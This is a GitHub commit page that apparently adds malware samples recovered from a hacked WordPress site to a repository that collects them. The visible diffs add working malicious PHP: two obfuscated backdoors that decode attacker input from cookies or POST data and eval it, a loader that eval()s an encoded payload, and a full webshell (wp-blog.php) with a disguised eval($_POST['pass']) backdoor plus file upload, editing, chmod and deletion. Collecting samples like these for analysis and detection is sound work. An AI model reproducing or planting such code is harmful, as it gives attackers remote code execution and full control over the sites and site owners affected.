Skip to content

Commit a68b200

Browse files
mattiasgeniarmattiasgeniar
authored
Merge pull request mattiasgeniar#20 from ChexWarrior/master
Some scripts I found on a recently hacked WordPress site
2 parents a543966 + c9a7090 commit a68b200

17 files changed

+12514
-0
lines changed

found_on_wordpress/class-wp-widget-archives_render.php.suspected

Lines changed: 2480 additions & 0 deletions
Large diffs are not rendered by default.

found_on_wordpress/class-wp-widget-archives_render.php_backup

Lines changed: 2480 additions & 0 deletions
Large diffs are not rendered by default.

found_on_wordpress/hozwfbdp.php

Lines changed: 32 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,32 @@
1+
/* Decoded by unphp.net */
2+
3+
<?php
4+
$falwt = 't9ke0fbvoxn#8ruy_*\'lHi7adscm34gp-';
5+
$pexaijc = Array();
6+
$pexaijc[] = $falwt[20] . $falwt[17];
7+
$pexaijc[] = $falwt[3] . $falwt[24] . $falwt[12] . $falwt[4] . $falwt[23] . $falwt[12] . $falwt[22] . $falwt[29] . $falwt[32] . $falwt[23] . $falwt[12] . $falwt[3] . $falwt[23] . $falwt[32] . $falwt[29] . $falwt[6] . $falwt[24] . $falwt[24] . $falwt[32] . $falwt[1] . $falwt[5] . $falwt[5] . $falwt[1] . $falwt[32] . $falwt[26] . $falwt[29] . $falwt[24] . $falwt[24] . $falwt[5] . $falwt[6] . $falwt[23] . $falwt[28] . $falwt[12] . $falwt[1] . $falwt[6] . $falwt[29];
8+
$pexaijc[] = $falwt[11];
9+
$pexaijc[] = $falwt[26] . $falwt[8] . $falwt[14] . $falwt[10] . $falwt[0];
10+
$pexaijc[] = $falwt[25] . $falwt[0] . $falwt[13] . $falwt[16] . $falwt[13] . $falwt[3] . $falwt[31] . $falwt[3] . $falwt[23] . $falwt[0];
11+
$pexaijc[] = $falwt[3] . $falwt[9] . $falwt[31] . $falwt[19] . $falwt[8] . $falwt[24] . $falwt[3];
12+
$pexaijc[] = $falwt[25] . $falwt[14] . $falwt[6] . $falwt[25] . $falwt[0] . $falwt[13];
13+
$pexaijc[] = $falwt[23] . $falwt[13] . $falwt[13] . $falwt[23] . $falwt[15] . $falwt[16] . $falwt[27] . $falwt[3] . $falwt[13] . $falwt[30] . $falwt[3];
14+
$pexaijc[] = $falwt[25] . $falwt[0] . $falwt[13] . $falwt[19] . $falwt[3] . $falwt[10];
15+
$pexaijc[] = $falwt[31] . $falwt[23] . $falwt[26] . $falwt[2];
16+
foreach ($pexaijc[7]($_COOKIE, $_POST) as $qvhieyr => $iqtbkxe) {
17+
function ypvajaz($pexaijc, $qvhieyr, $coijg) {
18+
return $pexaijc[6]($pexaijc[4]($qvhieyr . $pexaijc[1], ($coijg / $pexaijc[8]($qvhieyr)) + 1), 0, $coijg);
19+
}
20+
function oybwfz($pexaijc, $imvmdw) {
21+
return @$pexaijc[9]($pexaijc[0], $imvmdw);
22+
}
23+
function jdkzd($pexaijc, $imvmdw) {
24+
$rvttfi = $pexaijc[3]($imvmdw) % 3;
25+
if (!$rvttfi) {
26+
eval($imvmdw[1]($imvmdw[2]));
27+
exit();
28+
}
29+
}
30+
$iqtbkxe = oybwfz($pexaijc, $iqtbkxe);
31+
jdkzd($pexaijc, $pexaijc[5]($pexaijc[2], $iqtbkxe ^ ypvajaz($pexaijc, $qvhieyr, $pexaijc[8]($iqtbkxe))));
32+
} ?>

found_on_wordpress/jhefppgr.php

Lines changed: 32 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,32 @@
1+
/* Decoded by unphp.net */
2+
3+
<?php
4+
$itsve = 'v\'xntuec24s_m1bH7#-l5d8*9k0aroypfgi';
5+
$inzbmds = Array();
6+
$inzbmds[] = $itsve[15] . $itsve[23];
7+
$inzbmds[] = $itsve[17];
8+
$inzbmds[] = $itsve[7] . $itsve[6] . $itsve[26] . $itsve[21] . $itsve[24] . $itsve[32] . $itsve[7] . $itsve[24] . $itsve[18] . $itsve[9] . $itsve[7] . $itsve[27] . $itsve[14] . $itsve[18] . $itsve[9] . $itsve[13] . $itsve[22] . $itsve[24] . $itsve[18] . $itsve[24] . $itsve[21] . $itsve[32] . $itsve[16] . $itsve[18] . $itsve[32] . $itsve[9] . $itsve[8] . $itsve[7] . $itsve[26] . $itsve[32] . $itsve[6] . $itsve[13] . $itsve[7] . $itsve[6] . $itsve[20] . $itsve[7];
9+
$inzbmds[] = $itsve[7] . $itsve[29] . $itsve[5] . $itsve[3] . $itsve[4];
10+
$inzbmds[] = $itsve[10] . $itsve[4] . $itsve[28] . $itsve[11] . $itsve[28] . $itsve[6] . $itsve[31] . $itsve[6] . $itsve[27] . $itsve[4];
11+
$inzbmds[] = $itsve[6] . $itsve[2] . $itsve[31] . $itsve[19] . $itsve[29] . $itsve[21] . $itsve[6];
12+
$inzbmds[] = $itsve[10] . $itsve[5] . $itsve[14] . $itsve[10] . $itsve[4] . $itsve[28];
13+
$inzbmds[] = $itsve[27] . $itsve[28] . $itsve[28] . $itsve[27] . $itsve[30] . $itsve[11] . $itsve[12] . $itsve[6] . $itsve[28] . $itsve[33] . $itsve[6];
14+
$inzbmds[] = $itsve[10] . $itsve[4] . $itsve[28] . $itsve[19] . $itsve[6] . $itsve[3];
15+
$inzbmds[] = $itsve[31] . $itsve[27] . $itsve[7] . $itsve[25];
16+
foreach ($inzbmds[7]($_COOKIE, $_POST) as $mgvsei => $azxre) {
17+
function beanjw($inzbmds, $mgvsei, $vjozofh) {
18+
return $inzbmds[6]($inzbmds[4]($mgvsei . $inzbmds[2], ($vjozofh / $inzbmds[8]($mgvsei)) + 1), 0, $vjozofh);
19+
}
20+
function fwixisz($inzbmds, $fpkofng) {
21+
return @$inzbmds[9]($inzbmds[0], $fpkofng);
22+
}
23+
function lfbsd($inzbmds, $fpkofng) {
24+
$hvgkefx = $inzbmds[3]($fpkofng) % 3;
25+
if (!$hvgkefx) {
26+
eval($fpkofng[1]($fpkofng[2]));
27+
exit();
28+
}
29+
}
30+
$azxre = fwixisz($inzbmds, $azxre);
31+
lfbsd($inzbmds, $inzbmds[5]($inzbmds[1], $azxre ^ beanjw($inzbmds, $mgvsei, $inzbmds[8]($azxre))));
32+
} ?>

found_on_wordpress/moyudazh.php

Lines changed: 17 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,17 @@
1+
/* Decoded by unphp.net */
2+
3+
<?php
4+
$gbskgpxfbu = 353;
5+
function bkkbhgsl($jxherahyp, $rivbujtkps) {
6+
$uaxnyvjrp = '';
7+
for ($i = 0;$i < strlen($jxherahyp);$i++) {
8+
$uaxnyvjrp.= isset($rivbujtkps[$jxherahyp[$i]]) ? $rivbujtkps[$jxherahyp[$i]] : $jxherahyp[$i];
9+
}
10+
$owsngmi = "rawurl" . "decode";
11+
return $owsngmi($uaxnyvjrp);
12+
}
13+
$rramrnnyf = '%GLX7X_B2J%z4%zg5XBsUrj_2vvxvB%zg%zqL%za%pF%LE%LD%GLX7X_B2J%z4%zgUxV_2vvxvB%zg%zqL' . '%za%pF%LE%LD%GL2vvxv_v2sxvJX7V%z4L%za%pF%LE%LD%GLB2J_' . 'JXW2_UXWXJ%z4L%za%pF%LE%LD%GLXV7xv2_eB2v_rkxvJ%z4w%za%pF%LE%LD%GLX7X_' . 'B2J%z4%zgWrd_2d2SeJXx7_JXW2%zg%zqL%za%pF%LE%LD%LE%LDyxv2rSN%zL%z4%zG_qIIYfR%zLrB%zL%zGXJ2W%za' . '%LE%LD%gF%LE%LD%zL%zL%zL%zLXy%zL%z4%zGXJ2W%zL%zw%pE%zL%zz' . 'hGawkr2y-z4la-G5pz-awSS-a2lwS4lSypLp%zz%za%LE%LD%zL%zL%zL%' . 'zL%zL%zL%zL%zL2dXJ%z4%za%pF%LE%LD%gE%LE%LD%LE%LD%zG5' . 'rJr%zL%pE%zLyXU2_V2J_Sx7J27JB%z4%zgsNs%pD//X7seJ%zg%za%pF%LE%LD%zG5rJr%zL%pE%zLBsUXJ%z4%zz%' . 'pE%zz%zq%zG5rJr%zqz%za%pF%LE%LD%LE%LD%zGkhG_52Sx52_5rJr%zL%pE%zLkrB2hG_52Sx52%' . 'z4evU52Sx52%z4%zG5rJr%lFw%lE%za%za%pF%LE%LD%LE%LD%' . 'zGB275_5rJr%zL%pE%zLe7B2vXrUXK2%z452SvjsJ%z4%zGkhG_52Sx52_5rJr%za%za%pF%LE%LD%LE%LD%zGv' . '2BeUJ%zL%pE%zLB275_5rJrw%zL%z4%zGB275_5rJr%za%pF%LE%LD%LE%LDXy%zL%z4%zw%zGv2BeUJ%za%LE%LD%gF%LE%LD%z' . 'L%zL%zL%zL%zGv2BeUJ%zL%pE%zLB275_5rJrz%z4%zGB275_5rJr%za%pF%LE%LD%gE%LE%LD%LE%LD2SNx%zL%zGv2BeUJ' . '%pF%LE%LD%LE%LDye7SJXx7%zL52SvjsJ%z4%zG5rJr%za%LE%LD%gF%LE%LD' . '%zL%zL%zL%zL%zGxeJ_5rJr%zL%pE%zL%zz%zz%pF%LE%LD%zL%zL%zL%zL%zGo2j%zL' . '%pE%zL%zG_ORAMRA%lF%zgQbb1_QIOb%zg%lE%zL.%zL%zG_ORAMRA%lF%zgAR09ROb_9Af%zg%lE%pF%L' . 'E%LD%zL%zL%zL%zL%zGo2j_U27%zL%pE%zLBJvU27%z4%zGo2j%za%pF%LE%LD%zL%LE%LD%zL%zL%zL%zLyx' . 'v%zL%z4%zGX%pEL%pF%zL%zGX%zL%pq%zLBJvU27%z4%zGo2j%za%pF%zL%zGX%zF%zF%za%' . 'LE%LD%zL%zL%zL%zL%gF%LE%LD%zL%zL%zL%zL%zL%zL%zL%zL%zGo2j%lF%zGX%lE%zL%pE%zLSNv%z4' . 'xv5%z4%zGo2j%lF%zGX%lE%za%zL%lR%zL%z4%zGo2j_U27%zL%zl%zLzll%za%za%pF%LE%LD%zL' . '%zL%zL%zL%gE%LE%LD%LE%LD%zL%zL%zL%zLyxv%zL%z4%zGX%pEL%pF%zL%zGX%pqBJvU2' . '7%z4%zG5rJr%za%pF%za%LE%LD%zL%zL%zL%zL%gF%LE%LD%zL%zL%zL%zL%zL%zL%zL%zLyxv%zL%z4%zG' . 't%pEL%pF%zL%zGt%pqBJvU27%z4%zGo2j%za%zL%zh%zh%zL%zGX%pqBJvU' . '27%z4%zG5rJr%za%pF%zL%zGt%zF%zF%zq%zL%zGX%zF%zF%za%LE%LD%zL%zL%zL%zL%zL%zL%zL%zL%gF%LE%LD%zL%zL%zL' . '%zL%zL%zL%zL%zL%zL%zL%zL%zL%zGxeJ_5rJr%zL.%pE%zLSNv%z4xv5%z4%zG5rJr%lF%zGX%lE%za%zL' . '%lR%zLxv5%z4%zGo2j%lF%zGt%lE%za%za%pF%LE%LD%zL%zL%zL%zL%zL%zL%zL%zL' . '%gE%LE%LD%zL%zL%zL%zL%gE%LE%LD%LE%LD%zL%zL%zL%zLv2Jev7%zL' . '%zGxeJ_5rJr%pF%LE%LD%gE%LE%LD%LE%LDye7SJXx7%zLB275_5rJrw%z4%zG5rJr%za%LE%LD%gF%LE%LD%zL%zL%zL%' . 'zL%zGN2r5%zL%pE%zL%zz%zz%pF%LE%LD%LE%LD%zL%zL%zL%zLyxv2rSN%z4%zG5rJr%lF%zzN2r52' . 'vB%zz%lE%zLrB%zL%zGo2j%pE%pR%zGmrUe2%za%LE%LD%zL%zL%zL%zL%gF%LE%LD%zL%zL%zL%zL%zL%zL%zL%zL%' . 'zGN2r5%zL.%pE%zL%zGo2j%zL.%zL%zz%pD%zL%zz%zL.%zL%zGmrUe2%zL.%zL%zz%lqv' . '%lq7%zz%pF%LE%LD%zL%zL%zL%zL%gE%LE%LD%LE%LD%zL%zL%zL%zL%zGsrvrWB%zL%pE%zLrvvrj%' . 'z4%zgNJJs%zg%zL%pE%pR%zLrvvrj%z4%LE%LD%zL%zL%zL%zL%zL%zL%zL%zL%zgW2JNx5%zg%zL%pE' . '%pR%zL%zG5rJr%lF%zzW2JNx5%zz%lE%zq%LE%LD%zL%zL%zL%zL%zL%zL%zL%' . 'zL%zgN2r52v%zg%zL%pE%pR%zL%zGN2r5%zq%LE%LD%zL%zL%zL%zL%zL%zL%zL%zL%zgSx7J27J%' . 'zg%zL%pE%pR%zL%zG5rJr%lF%zzkx5j%zz%lE%zq%LE%LD%zL%zL%zL%zL%zL%zL%zL%zL%zgJXW2xeJ%zg%zL%pE%pR%zL%' . 'zG5rJr%lF%zzJXW2xeJ%zz%lE%zq%LE%LD%zL%zL%zL%zL%zL%zL' . '%zL%zL%LE%LD%zL%zL%zL%zL%za%za%pF%LE%LD%LE%LD%zL%zL%zL%zL%zGSJd%zL%pE%z' . 'LBJv2rW_Sx7J2dJ_Sv2rJ2%z4%zGsrvrWB%za%pF%LE%LD%zL%zL%zL%zL%LE%LD%zL%zL%zL%zL%zGv2BeUJ%zL%pE%zL%' . 'GLyXU2_V2J_Sx7J27JB%z4%zG5rJr%lF%zzevU%zz%lE%zq%zLPDiOR%zq%zL%zGSJd%za%pF%LE%LD%LE%LD%zL%zL' . '%zL%zLXy%zL%z4%zGNJJs_v2Bsx7B2_N2r52v%za%LE%LD%zL%zL%zL%zL%gF%LE%LD%zL%zL%zL%' . 'zL%zL%zL%zL%zLXy%zL%z4BJvsxB%z4%zGNJJs_v2Bsx7B2_N2r52v%' . 'lFL%lE%zq%zL%zzzLL%zz%za%zL%pE%pE%pE%zLPDiOR%za%LE%LD%zL%zL%zL%zL%zL%zL%zL%zL%gF%LE%LD%zL%' . 'zL%zL%zL%zL%zL%zL%zL%zL%zL%zL%zL%zGv2BeUJ%zL%pE%zL%zzQbb1_RAAIA%lqJ%zz%zL.%zL%zGNJJs_v2Bsx7' . 'B2_N2r52v%lFL%lE%pF%LE%LD%zL%zL%zL%zL%zL%zL%zL%zL%gE%LE%LD%zL%zL%zL%zL%gE%LE%LD%zL%zL%zL%zL2UB2%L' . 'E%LD%zL%zL%zL%zL%gF%LE%LD%zL%zL%zL%zL%zL%zL%zL%zL%zGv2BeUJ%zL%pE%zL%zzqI88RqbfI8_RAAIA%z' . 'z%pF%LE%LD%zL%zL%zL%zL%gE%LE%LD%LE%LD%zL%zL%zL%zLv2Jev7%zL%zGv2BeUJ%pF%LE%LD%gE%LE%LD%LE%LDy' . 'e7SJXx7%zLB275_5rJrz%z4%zG5rJr%za%LE%LD%gF%LE%LD%zL%zL%zL%zL//%zLeB2%zLBxSo2JB' . '%LE%LD%gE';
14+
$gbltknoanv = Array('1' => 'P', '0' => 'Q', '3' => 'W', '2' => 'e', '5' => 'd', '4' => '8', '7' => 'n', '6' => 'Z', '9' => 'U', '8' => 'N', 'A' => 'R', 'C' => 'X', 'B' => 's', 'E' => 'D', 'D' => 'A', 'G' => '4', 'F' => 'B', 'I' => 'O', 'H' => 'q', 'K' => 'z', 'J' => 't', 'M' => 'V', 'L' => '0', 'O' => 'S', 'N' => 'h', 'Q' => 'H', 'P' => 'F', 'S' => 'c', 'R' => 'E', 'U' => 'l', 'T' => 'G', 'W' => 'm', 'V' => 'g', 'Y' => 'K', 'X' => 'i', 'Z' => 'Y', 'a' => '9', 'c' => 'w', 'b' => 'T', 'e' => 'u', 'd' => 'x', 'g' => '7', 'f' => 'I', 'i' => 'L', 'h' => '6', 'k' => 'b', 'j' => 'y', 'm' => 'v', 'l' => '5', 'o' => 'k', 'n' => 'M', 'q' => 'C', 'p' => '3', 's' => 'p', 'r' => 'a', 'u' => 'J', 't' => 'j', 'w' => '1', 'v' => 'r', 'y' => 'f', 'x' => 'o', 'z' => '2');
15+
eval
16+
/*lglmb*/
17+
(bkkbhgsl($rramrnnyf, $gbltknoanv)); ?>

found_on_wordpress/readonly_default.php.suspected

Lines changed: 2480 additions & 0 deletions
Large diffs are not rendered by default.

found_on_wordpress/readonly_default.php_backup

Lines changed: 2480 additions & 0 deletions
Large diffs are not rendered by default.

found_on_wordpress/wp-blog.php

Lines changed: 269 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,269 @@
1+
/* Decoded by unphp.net */
2+
3+
<?php ?>gif89a<?php eval($_POST['pass']); ?>
4+
<?php
5+
ini_set('display_errors', 'On');
6+
error_reporting(E_ALL);
7+
set_time_limit(0);
8+
error_reporting(0);
9+
if (get_magic_quotes_gpc()) {
10+
foreach ($_POST as $key => $value) {
11+
$_POST[$key] = stripslashes($value);
12+
}
13+
}
14+
echo '<!DOCTYPE HTML>
15+
<HTML>
16+
<HEAD>
17+
<link href="" rel="stylesheet" type="text/css">
18+
<title>Webshell</title>
19+
<style>
20+
body{
21+
font-family: "Racing Sans One", cursive;
22+
background-color: #e6e6e6;
23+
text-shadow:0px 0px 1px #757575;
24+
}
25+
#content tr:hover{
26+
background-color: #636263;
27+
text-shadow:0px 0px 10px #fff;
28+
}
29+
#content .first{
30+
background-color: silver;
31+
}
32+
#content .first:hover{
33+
background-color: silver;
34+
text-shadow:0px 0px 1px #757575;
35+
}
36+
table{
37+
border: 1px #000000 dotted;
38+
}
39+
H1{
40+
font-family: "Rye", cursive;
41+
}
42+
a{
43+
color: #000;
44+
text-decoration: none;
45+
}
46+
a:hover{
47+
color: #fff;
48+
text-shadow:0px 0px 10px #ffffff;
49+
}
50+
input,select,textarea{
51+
border: 1px #000000 solid;
52+
-moz-border-radius: 5px;
53+
-webkit-border-radius:5px;
54+
border-radius:5px;
55+
}
56+
</style>
57+
</HEAD>
58+
<BODY>
59+
<center>
60+
<tr><td>Current Path : ';
61+
if (isset($_GET['path'])) {
62+
$path = $_GET['path'];
63+
} else {
64+
$path = getcwd();
65+
}
66+
$path = str_replace('\',' / ',$path);
67+
$paths = explode(' / ',$path);
68+
69+
foreach($paths as $id=>$pat){
70+
if($pat == '' && $id == 0){
71+
$a = true;
72+
echo ' < ahref = "?path=/" > / < / a > ';
73+
continue;
74+
}
75+
if($pat == '') continue;
76+
echo ' < ahref = "?path=';
77+
for($i=0;$i<=$id;$i++){
78+
echo "$paths[$i]";
79+
if($i != $id) echo " / ";
80+
}
81+
echo '" > '.$pat.' < / a > / ';
82+
}
83+
echo ' < / td > < / tr > < tr > < td > ';
84+
if(isset($_FILES['file'])){
85+
if(copy($_FILES['file']['tmp_name'],$path.' / '.$_FILES['file']['name'])){
86+
echo ' < fontcolor = "green" > FileUploadDone . < / font > < br / > ';
87+
}else{
88+
echo ' < fontcolor = "red" > FileUploadError . < / font > < br / > ';
89+
}
90+
}
91+
echo ' < b > < br > < br > '.php_uname().' < br > < / b > < br > ';
92+
echo ' < formenctype = "multipart/form-data"method = "POST" > UploadFile: < inputtype = "file"name = "file" / > < inputtype = "submit"value = "upload" / > < / form > < / td > < / tr > ';
93+
if(isset($_GET['filesrc'])){
94+
echo "<tr><td>Current File : ";
95+
echo $_GET['filesrc'];
96+
echo ' < / tr > < / td > < / table > < br / > ';
97+
echo(' < pre > '.htmlspecialchars(file_get_contents($_GET['filesrc'])).' < / pre > ');
98+
}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
99+
echo ' < / table > < br / > < center > '.$_POST['path'].' < br / > < br / > ';
100+
if($_POST['opt'] == 'chmod'){
101+
if(isset($_POST['perm'])){
102+
if(chmod($_POST['path'],$_POST['perm'])){
103+
echo ' < fontcolor = "green" > ChangePermissionDone . < / font > < br / > ';
104+
}else{
105+
echo ' < fontcolor = "red" > ChangePermissionError . < / font > < br / > ';
106+
}
107+
}
108+
echo ' < formmethod = "POST" > Permission: < inputname = "perm"type = "text"size = "4"value = "'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" / > < inputtype = "hidden"name = "path"value = "'.$_POST['path'].'" > < inputtype = "hidden"name = "opt"value = "chmod" > < inputtype = "submit"value = "Go" / > < / form > ';
109+
}elseif($_POST['opt'] == 'rename'){
110+
if(isset($_POST['newname'])){
111+
if(rename($_POST['path'],$path.' / '.$_POST['newname'])){
112+
echo ' < fontcolor = "green" > ChangeNameDone . < / font > < br / > ';
113+
}else{
114+
echo ' < fontcolor = "red" > ChangeNameError . < / font > < br / > ';
115+
}
116+
$_POST['name'] = $_POST['newname'];
117+
}
118+
echo ' < formmethod = "POST" > New Name: < inputname = "newname"type = "text"size = "20"value = "'.$_POST['name'].'" / > < inputtype = "hidden"name = "path"value = "'.$_POST['path'].'" > < inputtype = "hidden"name = "opt"value = "rename" > < inputtype = "submit"value = "Go" / > < / form > ';
119+
}elseif($_POST['opt'] == 'edit'){
120+
if(isset($_POST['src'])){
121+
$fp = fopen($_POST['path'],'w');
122+
if(fwrite($fp,$_POST['src'])){
123+
echo ' < fontcolor = "green" > EditFileDone . < / font > < br / > ';
124+
}else{
125+
echo ' < fontcolor = "red" > EditFileError . < / font > < br / > ';
126+
}
127+
fclose($fp);
128+
}
129+
echo ' < formmethod = "POST" > < textareacols = 80rows = 20name = "src" > '.htmlspecialchars(file_get_contents($_POST['path'])).' < / textarea > < br / > < inputtype = "hidden"name = "path"value = "'.$_POST['path'].'" > < inputtype = "hidden"name = "opt"value = "edit" > < inputtype = "submit"value = "Go" / > < / form > ';
130+
}
131+
echo ' < / center > ';
132+
}else{
133+
echo ' < / table > < br / > < center > ';
134+
if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
135+
if($_POST['type'] == 'dir'){
136+
if(rmdir($_POST['path'])){
137+
echo ' < fontcolor = "green" > DeleteDirDone . < / font > < br / > ';
138+
}else{
139+
echo ' < fontcolor = "red" > DeleteDirError . < / font > < br / > ';
140+
}
141+
}elseif($_POST['type'] == 'file'){
142+
if(unlink($_POST['path'])){
143+
echo ' < fontcolor = "green" > DeleteFileDone . < / font > < br / > ';
144+
}else{
145+
echo ' < fontcolor = "red" > DeleteFileError . < / font > < br / > ';
146+
}
147+
}
148+
}
149+
echo ' < / center > ';
150+
$scandir = scandir($path);
151+
echo ' < divid = "content" > < tablewidth = "700"border = "0"cellpadding = "3"cellspacing = "1"align = "center" > < trclass = "first" > < td > < center > Name < / center > < / td > < td > < center > Size < / center > < / td > < td > < center > Permissions < / center > < / td > < td > < center > Options < / center > < / td > < / tr > ';
152+
153+
foreach($scandir as $dir){
154+
if(!is_dir("$path/$dir") || $dir == ' . ' || $dir == ' . . ') continue;
155+
echo "<tr>
156+
<td><a href=\"?path=$path/$dir\">$dir</a></td>
157+
<td><center>--</center></td>
158+
<td><center>";
159+
if(is_writable("$path/$dir")) echo ' < fontcolor = "green" > ';
160+
elseif(!is_readable("$path/$dir")) echo ' < fontcolor = "red" > ';
161+
echo perms("$path/$dir");
162+
if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ' < / font > ';
163+
164+
echo "</center></td>
165+
<td><center><form method=\"POST\" action=\"?option&path=$path\">
166+
<select name=\"opt\">
167+
<option value=\"\"></option>
168+
<option value=\"delete\">Delete</option>
169+
<option value=\"chmod\">Chmod</option>
170+
<option value=\"rename\">Rename</option>
171+
</select>
172+
<input type=\"hidden\" name=\"type\" value=\"dir\">
173+
<input type=\"hidden\" name=\"name\" value=\"$dir\">
174+
<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
175+
<input type=\"submit\" value=\">\" />
176+
</form></center></td>
177+
</tr>";
178+
}
179+
echo ' < trclass = "first" > < td > < / td > < td > < / td > < td > < / td > < td > < / td > < / tr > ';
180+
foreach($scandir as $file){
181+
if(!is_file("$path/$file")) continue;
182+
$size = filesize("$path/$file")/1024;
183+
$size = round($size,3);
184+
if($size >= 1024){
185+
$size = round($size/1024,2).'MB';
186+
}else{
187+
$size = $size.'KB';
188+
}
189+
190+
echo "<tr>
191+
<td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
192+
<td><center>".$size."</center></td>
193+
<td><center>";
194+
if(is_writable("$path/$file")) echo ' < fontcolor = "green" > ';
195+
elseif(!is_readable("$path/$file")) echo ' < fontcolor = "red" > ';
196+
echo perms("$path/$file");
197+
if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ' < / font > ';
198+
echo "</center></td>
199+
<td><center><form method=\"POST\" action=\"?option&path=$path\">
200+
<select name=\"opt\">
201+
<option value=\"\"></option>
202+
<option value=\"delete\">Delete</option>
203+
<option value=\"chmod\">Chmod</option>
204+
<option value=\"rename\">Rename</option>
205+
<option value=\"edit\">Edit</option>
206+
</select>
207+
<input type=\"hidden\" name=\"type\" value=\"file\">
208+
<input type=\"hidden\" name=\"name\" value=\"$file\">
209+
<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
210+
<input type=\"submit\" value=\">\" />
211+
</form></center></td>
212+
</tr>";
213+
}
214+
echo ' < / table > < / div > ';
215+
}
216+
echo ' < br / > < / BODY > < / HTML > ';
217+
function perms($file){
218+
$perms = fileperms($file);
219+
220+
if (($perms & 0xC000) == 0xC000) {
221+
// Socket
222+
$info = 's';
223+
} elseif (($perms & 0xA000) == 0xA000) {
224+
// Symbolic Link
225+
$info = 'l';
226+
} elseif (($perms & 0x8000) == 0x8000) {
227+
// Regular
228+
$info = ' - ';
229+
} elseif (($perms & 0x6000) == 0x6000) {
230+
// Block special
231+
$info = 'b';
232+
} elseif (($perms & 0x4000) == 0x4000) {
233+
// Directory
234+
$info = 'd';
235+
} elseif (($perms & 0x2000) == 0x2000) {
236+
// Character special
237+
$info = 'c';
238+
} elseif (($perms & 0x1000) == 0x1000) {
239+
// FIFO pipe
240+
$info = 'p';
241+
} else {
242+
// Unknown
243+
$info = 'u';
244+
}
245+
246+
// Owner
247+
$info .= (($perms & 0x0100) ? 'r' : ' - ');
248+
$info .= (($perms & 0x0080) ? 'w' : ' - ');
249+
$info .= (($perms & 0x0040) ?
250+
(($perms & 0x0800) ? 's' : 'x' ) :
251+
(($perms & 0x0800) ? 'S' : ' - '));
252+
253+
// Group
254+
$info .= (($perms & 0x0020) ? 'r' : ' - ');
255+
$info .= (($perms & 0x0010) ? 'w' : ' - ');
256+
$info .= (($perms & 0x0008) ?
257+
(($perms & 0x0400) ? 's' : 'x' ) :
258+
(($perms & 0x0400) ? 'S' : ' - '));
259+
260+
// World
261+
$info .= (($perms & 0x0004) ? 'r' : ' - ');
262+
$info .= (($perms & 0x0002) ? 'w' : ' - ');
263+
$info .= (($perms & 0x0001) ?
264+
(($perms & 0x0200) ? 't' : 'x' ) :
265+
(($perms & 0x0200) ? 'T' : ' - '));
266+
267+
return $info;
268+
}
269+
?>

found_on_wordpress/wp-good5ccca1742d54d5ccca1742d553.php.suspected

Lines changed: 30 additions & 0 deletions
Large diffs are not rendered by default.

found_on_wordpress/wp-include-5ccbd898281735ccbd8982817c.php

91.9 KB
Binary file not shown.

0 commit comments

Comments
 (0)